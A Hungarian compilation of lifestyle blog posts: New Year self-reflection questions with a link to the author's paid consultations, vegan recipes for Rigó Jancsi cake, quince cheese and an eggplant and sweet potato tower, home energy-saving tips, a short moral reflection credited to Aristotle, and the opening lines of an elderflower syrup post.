szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Néhány hasznos gondolat amit érdemes átgondolnod, mielőtt lezárnád a 2022-es évet. Már csak egy kis idő és vége 2022-es évnek. Mielőtt átlépsz az új évbe, néhány dolgot érdemes tudatosan átgondolnod. Hogyan jellemeznéd ezt az évet röviden? Mik voltak az év legfontosabb eseményei? Mik voltak az év legjobb pillanatai, minek örültél idén? Milyen sikereid voltak? Milyen sikerei voltak másoknak, aminek örültél? Mi okozott számodra bánatot, rossz érzéseket idén? Kik segítettek terveid alakulásában, kiknek vagy hálás? Milyen lépéseket tettél ahhoz, hogy egyre jobban érezd magad és fejlődj? Mi jellemezte a kapcsolatodat Önmagaddal? Hogyan bánsz Önmagaddal? Elégedett vagy-e az életedben a bensőségességgel, meghittséggel, mélységgel, őszinteséggel? Gondold át a kapcsolataidat másokkal. Hogyan kommunikálsz, reagálsz, szeretsz, viszonzol? Hogyan bánsz másokkal - azokkal akiket szeretsz és azokkal akiket nem kedvelsz? Milyen volt a párkapcsolatod, baráti kapcsolataid, munkahelyi kapcsolataid? Kikkel kötöttél barátságot? Kikkel sikerült kibékülnöd, rendezi a kapcsolatod? Hogy érzed magad testileg és lelkileg? Van benned belső harmónia, nyugalom? Otthon érzed Önagadban magad? Milyen volt az egészséged, közérzeted, energiaszinted? Mennyire figyeltél a táplálkozásra, testmozgásra, pihenésre, napirendre? A mindennapi döntéseid hogyan hatnak arra, hogyan érzed magad? Szánsz időt, energiát arra a hétköznapokban, hogy foglalkozz a belső békéddel, az egészségeddel, testi-lelki jólléteddel? Mennyire vagy ráhangolódva a természetre? Sikerül a természettel összhangban élned? Van kapcsolatod az évszakokkal, fákkal, virágokkal, hegyekkel, kék éggel, folyókkal a nap és a hold váltakozásával? Mikor nézted legutóbb a kék eget vagy a naplementét vagy a holdfelkeltét? Mennyi móka, nevetés, öröm van az életedben? Mikor nevettél legutóbb annyira, hogy kifolytak a könnyeid? Mikor volt olyan örömérzeted, amit az egész testedben éreztél? Szánsz időt arra a hétköznapokban, hogy nevess, viccelj? Mit tanultál idén, miben sikerült fejlődnöd? Milyen rossz tulajdonságoktól sikerült megszabadulnod? Milyen változásokon mentél át amire büszke vagy? Vannak spirituális céljaid? Hogyan táplálod a lekedet? Mi hiányzik az életedből? Mit szeretnél másképpen csinálni? Mihez lenne szükséges, hogy időt, teret csinálj neki. Í rd össze a dolgaidat, átgondoltan, tudatosan a 2023-as évre vonatkozóan is - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz, mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2023-as éved sikeres legyen : Mit szeretnél elérni, megvalósítani 2023-ban? - írd össze a céljaidat, terveid. Mik lesznek az év fontosabb eseményei? Miben szeretnél fejlődni, mit szeretnél tanulni? Milyen kapcsolatot szeretnél kialakítani Önmagaddal? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy haladj az önismeret útján, hogy változtasd az Önmagadhoz fűződö viszonyodat? Milyen kapcsolatot szeretnél másokkal? - család, barátok, párod, munkahelyi kapcsolatok. Hogyan szeretnél bánni másokkal? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy változtasd az emberi kapcsolataidat? Milyennek szeretnéd látni a közérzeted, belső harmóniád, energia szinted, egészséged, táplálkozásod, testmozgásod és a spiritualisát az életedben? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy jobban érezd magad? Hogyan szeretnéd alakítani a kapcsolatodat a természettel? Mit szeretnél tudatosabban csinálni? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy változtasd a kapcsolatod a természettel? Mennyire örömtelinek, vidámnak szeretnéd az elkövetkezendő évet? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy többet nevess, hogy vidámabb legyél? Miben szeretnél fejlődni? Mit szeretnél tanulni? Milyen kedvezőtlen szokásaidtól vagy éppen rossz tulajdonságaidtól szeretnél megszabadulni? Milyen változásokat szeretnél az életedben? Milyen elképzeléseid vannak a spirituális (lelki) gyakorlataidról? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy fejlődj? Mit szeretnél megvalósítani, megváltoztatni, máshogyan csinálni a következő évben? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy tudj változtatni? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, kisebb pihenések, utazások, kulturális rendezvények, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, és Istennek is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, adakozz, légy nagylelkű és kegyes és fejlődj sokat az új évben :) Ha személyre szabott megoldást szeretnél a problémáidra, jó lenne ha egy tapasztalt szakember lépésről, lépésre kísérne a változás útján egyéni igényeidnek megfelelően, szeretettel várlak egyéni konzultációkra, életmódtanácsadásra. https://www.eljharmoniaban.hu/eletmodtanacsadas Sok szeretettel kívánok spirituális élményekben gazdag, harmonikus Új évet Kati
Rigó Jancsi (vegán)
Sütemény, ami személynevet hordoz? Nem véletlenül. Ki is volt Rigó Jancsi? Rigó János (Pákozd, 1858. augusztus 23. - New York, New York, 1927. február 3.) az egyik legismertebb cigányprímás, aki ötévesen már hegedűt vett a kezébe. A tanítótól lopott húrokat hozzá, amiért az esperes kérésére bocsánatot kért. E gesztusáért nála maradhattak a számára nagy kincsek. Ezután órák hosszat gyakorolt mindennap a szabadban: az erdő, a nádas világa hálás közönség volt: egymásnak muzsikáltak.
Ez a sütemény a nevét tehát Rigó Jancsi híres magyar cigányprímásról kapta. Milyen történet fűződik a prímás nevéhez? Ő az, aki elcsábította és feleségül vette Clara Ward, Caramane-Chimay hercegnőt, az amerikai milliomos E. B. Ward egyetlen lányát, aki Joseph Caraman-Chimay belga herceg felesége volt. Jancsi és Clara 1896-ban találkozott, amikor Rigó Jancsi egy párizsi étteremben játszott, ahol Clara férjével, Joseph herceggel vacsorázott. 1896 és 1898 között az újságok sokat foglalkoztak a prímás és a hercegnő házasságával. A tortát az azt készítő cukrász Rigó Jancsi és a romantikus szerelmi történet tiszteletére nevezte el.
A recept
Hozzávalók a piskótákhoz
- 32 dkg liszt
- 3 dkg kakaópor
- 15 dkg eritritol vagy gyümölcscukor
- 1 tsk vanília
- 2 tsk sütőpor
- 2 evőkanál olaj
- 1,5 evőkanál narancslé
- 1,5 dl növényi tej
Elkészítés:
Fogunk egy tálat, összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat és hozzáadjuk a narancslevet. Csomómentesre keverjük majd egy sütőpapírral bélelt tepsibe öntjük. Előmelegített sütőben kb. 20 percig sütjük. Tűpróbával ellenőrizzük, ha beleszúrjuk a piskóta közepébe, és nem ragad rá, megsült a piskótánk.
Amikor a piskóta kihűlt, közepén kettévágjuk (mint a tortákat) és megtöltjük a csokis tejszínes krémmel. A két piskóta lap közé minél vastagabb krémet érdemes kenni. Amikor a krémet az alsó lapra kentük, óvatosan ráhelyezzük a felső piskóta lapot, majd ráöntjük és elegyengetjük a folyékony csokit a tetején. Ekkor érdemes kockákra vágni és a hűtőbe betenni.
Hozzávalók a csokis krémhez
- 5 dl növényi tejszínhab
- 5 dkg vegán csoki (pl tortabevonó) vagy 5 dkg cukrozatlan kakaópor
- ízlés szerint eritritol (porrá őrölt) vagy más édesítő - lehetőleg por alapú és nem folyékony - csoki mellett elhagyható
A növényi tejszínt kemény habbá verjük. Magyarországon a Meggle termékei között találsz növényi tejszínt, amit süteményekhez használhatsz. Másik megoldás konzerves kókusztejet pár órára fagyasztóba tenni vagy egy éjszakára hűtőbe és felrázás nélkül felbontás után a kemény réteget lekanalazni róla és habverővel habbá verni. Most azonban kipróbáltam az Elmlea double cream-et. Mivel először használtam és tartottam tőle, hogy hosszú távon megőrzi a hab a szilárdságát, kevertem hozzá 1-2 kanál útifű maghéjat (psylikum husk). Amikor már kezd a krém habbá verődni, hozzácsurgatjuk a nem forró olvasztott csokit vagy a kakaó port. Másik megoldás, hogy a tejszínt először kikeverjük az olvasztott csokival majd alaposan lehűtjük és utána verjük csokis habbá.
Hozzávalók a csokis tetejéhez
- 10 dkg étcsoki (vegán)
- pár csepp olaj
Vízgőz felett megolvasztjuk a darabokra tört csokit és hogy még folyékonyabb legyen, pár csepp olajat csepegtetünk bele.
Birsalmasajt
Életem első birsalmasajtja. Az elkészítése ezzel a módszerrel egyszerű és gyors volt. A birsalmasajt igazi retró édesség, rengeteg cukorral, szóval nem mindennapos fogyasztásra ajánlott. Azt olvastam, hogy már 1578-ban is megemlítették valahol a létezését. Nagyon sok recept 1 kg cukrot használ 1 kg tiszta birsalmához, ez nekem nagyon sok, és 1 kg/60 dekával is működik. Hozzávalók: 3 kg birsalma 1 citrom 60 dkg cukor/1 kg tisztított birsalmához Ízlés szerint őrölt fahéj, dió (de remekül illik hozzá a gyömbér, őrölt szegfűszeg is) A birsalmát alaposan megmostam, kivágtam belőle a magházat, és a birsalmát nagyobb darabokra vágtam. Vannak, akik megpucolják, és rajta hagytam a héját, mert nagy a pektintartalma, és a megfőtt pépben egyáltalán nem észrevehető. A birsalmát fazékba tettem, felöntöttem annyi vízzel, ami ellepi, belefacsartam a fél citrom felét, majd feltettem főni. Nagyjából fél óra alatt megpuhult. Ekkor leszűrtem, kicsit hűni hagytam. Botmixerrel krémesre turmixoltam, lemértem és kiszámoltam a cukor mennyiségét. Ahogy már írtam, 1 kg péphez 60 dkg cukrot számoltam. Adtam hozzá egy kevés őrölt fahéjat is (elhagyható), majd belefacsartam a maradék citrom levét. Alaposan összekevertem és magasfalú tepsibe tettem. Úgy gondoltam, a gyümölcspép sűrítése már a szilvalekvárnál is bevált, itt is ezt alkalmazom, így nem kell a tűzhely mellett állni és folyamatosan kevergetni. 140 fokosra melegítettem a sütőt, beletettem a tepsit, és 20-30 percenként megkevertem a birsalma pépet. Nagyjából 2-2 és fél óra alatt szépen besűrűsödött. Ekkor 2 kisebb tepsibe sütőpapírt tettem, beleöntöttem a pépet, raktam pár muffinformába is. Ekkor meg lehet szórni egy marék durvára vágott dióval. Egy nap alatt szépen megszilárdult, kivettem a formákból, tálcára tettem és hűvös, jól szellőző helyen száradni hagyom legalább egy hétig. Naponta megfordítom, hogy mindkét oldala jól kiszáradjon. Így akár egy évig is eláll. Ui.: a lé sem ment kárba, amiben a birsalma főtt. Amikor kihűlt, tettem hozzá citromlevet, negyedannyi édesítőt, egy kevés vizet, és isteni birsalmás limonádé lett belőle. The post Birsalmasajt appeared first on Vegavarazs.
Padlizsán-édesburgonya torony
Ez még mindig a mini padlizsánokból készült, de normál méretű padlizsánokkal is el lehet készíteni, egyszerűen csak megfelelő méretű batátát, azaz édesburgonyát kell hozzá szerezni. Air-fryer-ben (forró levegő sütő) is elkészíthető. Ha társaságnak kínáljuk érdemesebb fogpiszkálót beleszúrni, így megtartja a "torony" önmagát. Roppant egyszerű elkészíteni és nem csak eteti magát, hanem gyorsan laktat is.
A recept
Hozzávalók:
- Néhány darab padlizsán
- néhány darab édesburgonya
- 1 (akár füstölt vagy natur) tofu vagy vegán feta
- esetleg jackfruit (nekem pörköltből maradt egy kevés, abból szedtem ki darabokat és tettem a tetejére)
- Bazsalikom levelek
- só
Elkészítés:
A padlizsánokat megmossuk, felszeleteljük, besózzuk és egy tálcán pihentetjük őket. Az édesburgonyákat megmossuk és vékony szeletekre vágjuk. Igény esetén fűszerezhető vagy sózható, számunkra anélkül ízletes. Egy tepsibe sütőpapírt helyezünk, ha nem olajmentesen étkezünk, egy kevés olíva olajat csepegtethetünk alá vagy a tetejére, sütőben puhára sütjük. Mindez air fry-erben is elkészíthető, kisebb mennyiségekkel adagolva.
Közben a padlizsán levet eresztett, letöröljük, majd a padlizsán szeleteket az édesburgonyához hasonlóan megsütjük. A padlizsánra egy pici csepp bazsalikomos olajat cseppentettem, még jobban kihozta az ízét. Amíg sül a vegán fetákat vagy tofukat felkockázzuk.
Miután megsült a két zöldség, a tornyokat összeállítjuk. Egy szelet édesburgonya, egy szelet padlizsán, egy kocka tofu/vegán feta, és egy kisebb bazsalikom levél - ennek híján őrölt bazsalikommal is megszórhatjuk.
Ha tálaljuk, nagyobb társaságnak, a közepébe érdemes fogpiszkálót szúrni.
Takarékoskodj az energiával- tudatosság a hétköznapokban
2022. július 23. Élj harmóniában
Mai rohanó életforma sajnos háttérbe szorította, a hagyományos a természettel összhangban működő életformát és az emberek az erőfeszítés megspórolása, időmegtakarítás és sok esetben divat miatt megannyi elektromos gépet alkalmaznak. Ez bizonyos határig még jó is, de egy bizonyos ponton túl kifejezetten pazarló, környezetre, egészségre károsító. A gépek gyártásához már az alapanyagok bányászata, alkatrészek előállítása, az ezekhez kapcsolódó szállítás is hihetetlen környezeti terhelés. Aztán a gép működtetése, alkatrészek cseréje, etc. újabb környezeti terhelést jelent. Most, hogy itt az energiaköltségek emelkedése, sokan még mindig nem újragondolják a fogyasztásukat, nem értik, hogy elég az amink van, lehet egyszerűbben is élni... sokan szeretnék napelemmel, mindenféle alternatív módszerekkel elérni, hogy továbbra is ugyanúgy tudjanak fogyasztani... nem ez a megoldás... sajnos a napelem előállítása is károsanyagkibocsájtással jár és lévén nem örök életű, időről, időre cserélni is kell. Ha eddig nem is próbáltad tudatosan végiggondolni, mit és mennyit használsz, mennyi energiával, környezeti terheléssel élsz, lehet most az energiaköltségek emelkedése segítségedre lesz. Bár évek óta minden fórumon beszélnek róla, hogy az emberek fogják vissza a pazarlást, fogyasztást, úgy tűnik csak akkor lesz változás, ha ez mindenkinek a saját zsebére megy. Aki eddig játszi könnyedséggel döntött egy-egy újabb gép, kényelmi eszköz, ketyere megvásárlása mellett, most lehet jobban átgondolja tudatosan szükséges-e az adott berendezés számára. Érdemes most mindenkinek tudatosan átgondolni, mire nincs igazán szüksége. miről tud lemondani, mit tud más akár manuális megoldással kiváltani. Tekintsd át a hétköznapi feladataidat, szokásaidat, melyiket tudnád elhagyni, helyettesíteni, vagy csak az adott eszköz használatát csökkenteni. Ezzel a bejegyzéssel szeretnék segíteni, hogy átlásd hol tudsz csökkenteni a fogyasztásodon, mit tehetsz azért, hogy a Föld élhetőbb legyen. Az energia felhasználásával, hozzájárulunk a Föld energiakészleteinek kimerüléséhez, saját költségeinket növeljük és az energiafelhasználás következtében kibocsátott káros anyagok hozzájárulnak a környezetszennyezéshez, klímaváltozáshoz. Minden pillanatban, amikor valamilyen energiát használunk (mosunk, főzünk, filmezünk, zenét hallgatunk, etc.) komoly döntéseket hozunk, mi magunk is hatással vagyunk a környezetünk alakulására. Elég egy kis odafigyelés, ha megváltoztatod a szokásaidat, Te magad is sokat tehetsz a környezet védelmére, a saját egészségedért és költségeid csökkentésére:) OTTHON A fűtés a háztartások legnagyobb energiafogyasztója. A felhasznált energia több, mint 70%-át erre fordítjuk. Ha egyetlen fokkal csökkented a szoba hőmérsékletét, az 6% energia megtakarítást jelent - ami hozzájárul a környezet védelméhez is. Mindig csak ott és annyit fűts, ahol és amennyire szükséges - általában egy szobában nappalra 20-22 fok javasolt, éjszakára 18 fok. Ha napközben elmész otthonról, állítsd alacsonyabbra a termosztátot, tekerd le a konvektorokat (csökkentsd 5-6 fokkal a hőmérsékletet) Nappal húzd fel a redőnyt és a függönyöket is húzd el, hogy be tudjon jönni a napfény. Naplemente után húzd be a sötétítő függönyöket, ereszd le a redőnyt - ez segít benttartani a meleget és kint tartani a hideget. Nem csak a vagyonokba kerülő fűtéskorszerüsítés segíthet, néha már az is szuper ha szigetelsz, nyílászárót cserélsz. Szigetelésnek tehetsz a bejárati ajtó elé vastag függönyt is, segít a hő megtartásába. Próbálj klasszikus fűtési megoldást választani - cserépkályha, vaskályha, kemence, sparhelt. Ezek nem csak, hogy kevesebbe kerülnek és környezetbarátabb megoldások, de természetes megoldások és az egészségedre is kedvezőbben hatnak. Rendszeresen ellenőriztesd szakemberrel a fűtési berendezéseidet - gázkazánt, konvektort, cirkót. Figyelj a lakás páratartalmára, mert befolyásolja a hőérzeted. Szellőztess több alkalommal, jól kinyitott ablakokkal - a résnyire nyitott ablak energiapazarlás. A fűtőtestet hagyd szabadon, ne pakolj a radiátor elé és ne is takard el függönnyel, mert csak elvonja a hőt. Tegyél hőtükörfóliát a radiátorok mögé. A hűvösebb helyeket (pl. előszoba, kamra ) ajtaját tartsd csukva . Öltözz fel jól otthonra, húzz meleg zoknit, vastag pulóver, használj takarót. Ha így teszel, akkor alacsonyabb hőmérsékletben is komfortosan fogod érezni magad, Sajnos én nagyon fázós vagyok, így a fűtésen eddig én sem spróroltam, ebbe nem vagyok elég hiteles, de érzem itt nekem is van tennivalóm:). Ma nagy divat a jakuzzi, szauna, medence otthon, de fenntartani költséges. Van aki hitelre vásárol ilyesmit. Ezek luxus dolgok, ha nem vagy milliárdos, nincs a bankszámládon egy szép nagy összeg, ami biztosít arról, hogy neked nem fog gondot okozni ezek fenntartása, akkor sem amikor emelkednek az energiaárak, akkor érdemes átgondlni biztos, hogy szükséged van medencére, jakuzzira, szaunára? Ahogy a régi öregek mondták, addig nyújtózkodj, amíg a takarod ér:) Sokan lelkesen szaladnak most napelemet vásárolni, de azon túl, hogy halljuk másoktól most ez kell értjük hogyan működik? A napelemed valóban termel majd áramot, ha nem lesz áram? Nem minden napelem lesz képes erre. Számold át azt is meg fog-e az esetedben térülni. Sokan most csak szereltetnek és utána se lesz ingyen az áram, nehogy meglepetés legyen mire megtérülne addigra már kell cserélni, újat venni és felrakatni. Hogy viszonyulsz a meleghez és a légkondicionálás hoz? Itt európában a melegbe nem nagyon halnak bele emberek, legfeljebb abba, hogy kiszáradnak. Ma sokan egész nap nyomják a légkondit. A minap egy kedves tanítványom mesélte a szuper üléshűtés miatt jól megfázott a combja és iszonyatos fájdalmakkal küzdött. Azon túl, hogy a légkondi káros lehet az egészségedre, biztos hogy nélkülözhetetlen? vagy azért el tudsz viselni nyáron ennyi kellemetlenséget? Érdemesebb fákat ültetni, mert árnyékot és hűvöset is adnak, éjszaka szellőztetni, lehűteni a lakást és nappalra besötétíteni, becsukni az ablakokat. Használd ki a természetes fény lehetőségeit. Nyáron nagyon sokáig, de télen napközben élvezd, hogy természetes fénynél tudod végezni a tevékenységeidet és amíg nem szükséges ne kapcsolj villanyt A világítást a lakásban a célnak megfelelően alakítsd ki és használd. Azokban a helységekben ahol nem szükséges komolyabb fényerő, ott csak kisebbet használj (pl. előszoba). Ha olvasni szeretnél, akkor csak valamilyen kisebb helyi fényforrást használj és ne az egész nappali legyen kivilágítva. Amelyik szobában nem tartózkodsz vagy éppen nem szükséges a világítás, akkor kapcsold le a lámpát. A szüleim gyerekkoromban sokszor szóltak, miért ég a villany a szobában ha nem vagyok ott:) Használj energiatakarékos izzókat. Csak akkor használj elektromos berendezések et, ha valóban szükséges. Manapság nagyon sok elektromos gép van, amiket ha tudatosan végiggondolod nincs is rá szükséged. Sőt azt gondolom bizonyos esetben egyszerűbb, olcsóbb és csendesebb a manuális megoldás, mint egy gépet összerakni majd utána eltakarítani és a végén elpakolni. Minden elektromos berendezés, műszaki cikk vásárlás előtt gondold végig valóban szükséged van-e rá és mire szeretnéd használni (a nagyobb teljesítményű gépek fogyasztása is nagyobb, a konyhában a legtöbb ma kapható gép kézi erővel kiváltható és még sokszor egyszerűbb is). Nemrégen egy közeli ismerősöm mondta, hogy szeretne venni több tízezer forint értékben egy konyhai szupercsoda gépet és mit gondolok. Kérdeztem mire vásárolná... bébiétel készítésre... Mondtam használjon inkább villát :))) csöndesebb, nincs meghibásodási lehetőség és szervizköltség, áramszünet esetén is működik, gyorsan el lehet mosni és elpakolni és a használatba vétel sem igényel bonyolultabb összerakást:) Ha már eldöntötted megveszel valamit, nézd meg a termék leírását, mekkora a fogyasztása és válassz alacsonyabb fogyasztású gépeket. Próbáld azt is figyelembe venni mennyire környezetkímélő a termék. A konyhádban igazából a hűtő, főzőlap és sütő segítségével mindent meg lehet oldani. Sajnos a fogyasztói társadalomnak köszönhetően, ma sok konyhában külön van szeletelőgép és aprítógép a kés helyett, vízforraló a lábas helyett, kenyérpirító és melegszendvicssütő egy serpenyő helyett, kenyérsütő gép a sütő helyett, joghurtkészítő egy befőttes üveg és dunszt helyett, és hosszasan sorolhatnám a mosogatógéptől, olajsütőn át, pároló, popcorn készítő, palacsintasütő, tojásfőző, kávéfőző.... mennyi mindenfélét vásároltattak össze az emberekkel. Ehhez a cikkhez felnéztem egy műszaki online bolt oldalára, szinte elhültem rajta, mit ki nem találtak már, jópénzért... Sokan működtetnek fagyasztóládákat, amikor ma mindent lehet frissen kapni a boltban, hihetetlen nagy pazarlás hónapokig otthon hűteni valamit. Hiába veszel valamit akciósan, a fagyasztó áramfelhasználása sokkal drágább lesz, mintha friss ételeket vennél. Ha ragaszkodsz a fagyasztóhoz, legalább évente olvaszd le. A hűtőt a lakáson belül valami hűvösebb helyre állítsd. Ne tegyél a hűtőbe meleg ételt. Az elektromos főzőlapot, sütőt a főzés befejezése előtt 5 perccel nyugodtan kapcsold ki - még sokáig elég meleg lesz ahhoz, hogy befejezd a főzési folyamatot.Főzéskor az edény méretének megfelelő főzőlapot használd, hogy ne távozzon fölöslegesen hő. Használj a főzéshez jó hővezetésű edényeket, fedőt, kuktát illetve főzz takarékon.Az ételeket ne főzd szét, éppen csak szükséges menyiségben kapjanak hőkezelést. Készíts egytálételeket vagy a sütőben egyszerre többfélét süss több szinten. Nézd át otthon a konyhádat, mire van valóban szükséged. mi az amit meg tudsz oldani olcsóbban, halkabban:) Figyeld meg a mosás i szokásaidat is. Sokan egy egy darabbal is elindítják a mosógépet vagy feleslegesen nagyon hosszú programokat működtetnek. Sok helyen látom, hogy szárító gépet használnak, ez télen vicces, amikor párhuzamosan meg bekapcsolják a párologtatót. A vasalás is nagyon sok energiát elvisz egy háztartásban. Csak azt vasald ki, amit nagyon szükséges. A legtöbb ruha felvétel után a test hőjétől a testhez alakul. A törölközőket, fehérneműket, zoknikat, hálóruhákat, ágyneműt szinte teljesen felesleges vasalni.A mosógépet és a mosogatógépet csak ha tele van akkor indítsd el, mert sok készülék ugyanannyi áramot és vizet használ el 2 póló esetén is. Használd a hőfokszabályozást, de mindent a legmagasabb hőfokon moss. Vízkőtelenítsd rendszeresen a mosógépet.Kerüld el a szárítógép használatát. Természetes módon szárítsd a ruhákat pl. napon vagy szárítóállványon. A szórakoztató elektroniká ban, mind minden másban is sok a túlkapás. a 40 nm-es lakásban néha annyi hangfal és mélynyomó meg minden van, hatalmas képernyő, amit a tulajdonosa soha nem fog tudni kihasználni az otthonában vagy esetleg a halláskárosodást kockáztatja. Sok családban a tv, számítógép akkor is megy amikor senki nem használja, amolyan háttérzajnak. Kapcsold le, áramtalanítsd azokat a berendezéseket, amikre éppen nincs szükséged, éppen nem használod őket. Amikor egy készülék standby üzemmódban van (pl a tv-n világít a kis lámpa) akkor is fogyaszt áramot. Használd a számítógépen az energiatakarékos üzemmódot . A kertben is sok berendezés sorakozik a háztartásokban. A legbutább találmány a lombfújó, ezen mindig nevetek az emberek kergetik vele a faleveleket jobbról, balra balról jobbra, hallgatják a zajt, nyelik a port és a benzinesnél szívják a büdöset, ha elromlik meg vihetik szervízbe.. Egy hagyományos seprű sokkal praktikusabb és olcsóbb. Takarítás nál részesítsd előnyben a hagyományost (söprű, lapát, vödör), így sok energiát spórolhatsz meg. Amennyiben szükséges gépi megoldás, nagyon tudatosan válaszd meg, hogy a céljaidnak megfeleljen. Lehetőleg olyan porszívót válassz, amelyhez nem kell eldobható porzsákot használni és a teljesítménye és a tudása is illeszkedjen az elvárásaidhoz. Ma sokan a terítő lerázása helyett morzsporszívót használnak, néhány leesett dolgohoz viszik a porszívót, mérlegelj, tudatosítsd mire mit érdemes használni, térj vissza a hagyományos megoldásokhoz:) A szépségápolás ban is nagyon sok fölösleges gépet adtak el az elmúlt évtizedben.Ha jó idő van a hajad megszárad magától. Az is kérdés, feltétlenül szüksége-e otthon a hajunkat vasalni, bodorítani, mindenféle gépi eljárással alakítani. A testünk, arcunk masszírozására is már vannak gépek, ezt a saját kezünkkel is el tudjuk könnyedén végezni. Lehet a hagyományos körömreszelő és sarokreszelő is megteszi, az elektromos helyett. Néha meglepő árakon árulnak elektromos borotvát, persze tudom tud ezt azt, de a vége ugyanaz, mint a hagyományos borotvával, eltűnik a szőr a férfiak arcáról:) A fogmosás szuper jól megoldható hagyományos fogkefével is, ilyen olyan speciális elektromos fogkefe nélkül . A kertben is sok berendezés sorakozik a háztartásokban. A legbutább találmány a lombfújó, ezen mindig nevetek az emberek kergetik vele a faleveleket jobbról, balra balról jobbra, hallgatják a zajt, nyelik a port és a benzinesnél szívják a büdöset, ha elromlik meg vihetik szervízbe.. Egy hagyományos seprű sokkal praktikusabb és olcsóbb. Nézd át mekkora területen, milyen munkálatokat kell elvégezni. Valóban szükséges az ágvágó gép, elektromos sövénynyíró, fűkasza, jót mulattam gyepszellőztető :))) szóval nézz körül a kertben is, lehet a sarlóval, seprűvel és sövényvágó ollóval kiválthatsz néhány berendezést. A babaápolás ra is hihetetlen mennyi dolgot eladnak a szülőknek, pedig a gyerekek a sok műszaki berendezés és az őket érő elektroszmog nélkül is egész jól fel tudnak nőni:) MIelőtt valami menő, divatos dolgot veszel, érdemes itt is átgondolni valóban szükségetek van-e rá. Amikor elkezded megváltoztatni az energiafelhasználási szokásaidat nézd meg a korábbi felhasználásokat és a fogyasztásmérők segítségével kövesd nyomon energiafelhasználási szokásaid alakulását:) Pl. a vízforraló helyett ha a gázon forralod a vizet kb havi 500 forintot tudsz megtakarítani, ha a minden napos hajszárító használat helyett természetesen hagyod megszáradni a hajad, akár havi 1000 Ft-ot is spórolhatsz:) Kezdj el változtatni és tapasztalj, figyelj:) #rezsicsökkentés #rezsi #energiaáremelés #gáz #villany #tudatosság
Arisztotelész - a magunk dolgában
2022. július 20. Élj harmóniában
A világban megannyi nehézség, szenvedés... s a tömeg keresi a felelősöket, kire, mire lehetne fogni, hogy ez vagy az van a világban... mindig fújunk, dühöngünk valamin, fröcsögünk, acsarkodunk... a düh és érzelmi cunami elönti az embereket, mert ez könnyebb... Könyebb, mint befelé figyelni, nem másokat hibáztatni, önvizsgálatot tartani, őszintének lenni... megérteni, hogy ami velünk történik, az saját tetteink eredménye... Nem elég mutogatni és várni, hogy majd valaki a szomszéd, a kormány, az USA, a keresztények, majd valaki megoldja a jelen lévő problémákat, majd valaki nem használ túl sok áramot, vizet, nem utazgat, nem háborúzik, majd más nem pazarol... A problémákat mi magunk hozzuk létre és őszinte önvizsgálattal, a saját felelősségünk megértésével, saját magunk felé szeretettel, türelemmel, az önkonktroll fejlesztésével, alázatosabb hozzáállással hozhatunk létre csodás változásokat. Az életben minden értünk van és a fejlődésünket szolgálja, ha ezt értjük és tanulunk belőle könnyen tudunk fejlődni, ha nem akkor nagyon sokat fogunk szenvedni. A személyiség és az önkontroll fejlesztése nem könnyű feladat, de megéri őszintén megnézni hol tartunk és tenni azért , hogy a saját életünkben változásokat hozzunk létre. Ha az az energia ami ma elmegy mások bírálására, dühöngésre arra lenne fordítva, hogy mindenki a saját életében jobbá szeretne válni, kontrolláltabban élne, elfogadobb lenne, figyelembe venné Isten törvényeit, hálás lenne mindazért ami van, tisztelne másokat, akkor a világunk sokkal inkább olyan hely lenne, ahol az emberek szeretnének élni.
Bodzaszörp télire
Tudtad, hogy Harry Potter pálcája bodzafából készült? Az Elder Wand már elnevezésével is különleges, ugyanis ez tulajdonképpen egy angol szójáték. Az elder szó jelentése idős, valamint bodza- is. Mindkettő igaz a pálcára, ugyanis ez a pálca a világ legerősebb pálcája, mondhatni, a pálcák nagy örege, valamint bodzafából készült.
